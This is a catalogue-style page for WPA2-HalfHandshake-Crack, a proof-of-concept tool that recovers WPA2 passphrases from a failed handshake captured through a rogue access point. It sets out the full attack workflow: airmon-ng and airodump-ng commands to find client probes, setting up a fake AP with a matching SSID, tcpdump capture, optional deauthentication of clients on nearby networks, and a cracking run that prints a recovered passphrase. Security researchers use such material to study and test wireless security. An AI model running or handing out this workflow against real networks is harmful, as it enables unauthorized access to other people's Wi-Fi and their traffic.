You are here: Home » Wireless Attacks » WPA2-HalfHandshake-Crack


WPA2-HalfHandshake-Crack Description

This is a POC to show it is possible to capture enough of a handshake with a user from a fake AP to crack a WPA2 network without knowing the passphrase of the actual AP.

Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.


Author: Dylan Ayrey

License: MIT

WPA2-HalfHandshake-Crack Help

Mandatory arguments:
-r 	Where to read input pcap file with half handshake (works with full handshakes too)
-m 	AP mac address (From the 'fake' access point that was used during the capture)

Optional arguments:
-d 	 Where to read dictionary from

WPA2-HalfHandshake-Crack Usage Example

To read input pcap file with half handshake (-r sampleHalfHandshake.cap) captured from AP with specified MAC (-m 48d224f0d128) and SSID (-s "no place like"):

python -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like"


loading dictionary...
0.00788388022717% done. 250.469172638 hashes per second
0.0143003228938% done. 237.207726195 hashes per second
0.0212346846995% done. 238.343685782 hashes per second
0.0286869656441% done. 243.284719499 hashes per second
0.0353048213093% done. 240.624328943 hashes per second
0.0408005188399% done. 232.44365987 hashes per second
0.0468141355095% done. 229.104042665 hashes per second
0.0534895377457% done. 229.456259021 hashes per second
0.0597908872703% done. 228.302626008 hashes per second
0.0664375162209% done. 228.54339761 hashes per second
0.0731129184571% done. 228.830520246 hashes per second
0.0798170939787% done. 229.162336484 hashes per second
0.0865212695004% done. 229.442956452 hashes per second
Passphrase found! interwebs

Capturing half handshakes

To listen for device probes the aircrack suite can be used as follows

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted

Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything

Capture traffic on this interface.

In Linux this can be achieved with TCPdump

sudo tcpdump -i wlan0 -s 65535 -w file.cap

(optional) Deauthenticate clients from nearby Wi-Fi networks to increase probes

If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks

How to install WPA2-HalfHandshake-Crack

Installation on Kali Linux

git clone
cd WPA2-HalfHandshake-Crack/
sudo python install

WPA2-HalfHandshake-Crack Screenshots

WPA2-HalfHandshake-Crack Tutorials

Coming soon…

Related tools